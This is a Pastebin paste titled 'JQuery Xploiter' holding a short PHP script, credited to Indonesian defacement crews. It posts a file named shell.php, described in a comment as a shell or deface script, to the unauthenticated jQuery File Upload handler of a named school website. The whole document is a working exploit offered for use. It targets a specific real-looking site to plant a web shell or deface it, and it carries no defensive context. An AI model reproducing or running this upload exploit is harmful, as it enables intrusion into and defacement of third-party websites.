Advertisement
choirurrizal

JQuery Xploiter

Oct 29th, 2016
430
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.64 KB | None | 0 0
  1. <?php
  2. # Thanks to IndoXploit Coders Team
  3. # Greet to All Members N45HT
  4. $file = "shell.php"; //shell ataupun script deface
  5. $post = array("files[]" => "@$file",
  6.       );
  7.      $ch2 = curl_init ("http://www.haturiass.edu.bd/assets/super_admin/vendor/jquery-file-upload/server/php/");
  8.      curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  9.      curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  10.      curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  11.      curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  12.      curl_setopt ($ch2, CURLOPT_POST, 1);
  13.      curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  14.      $data = curl_exec ($ch2);
  15.      echo $data."\n\n\n";
  16.      ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement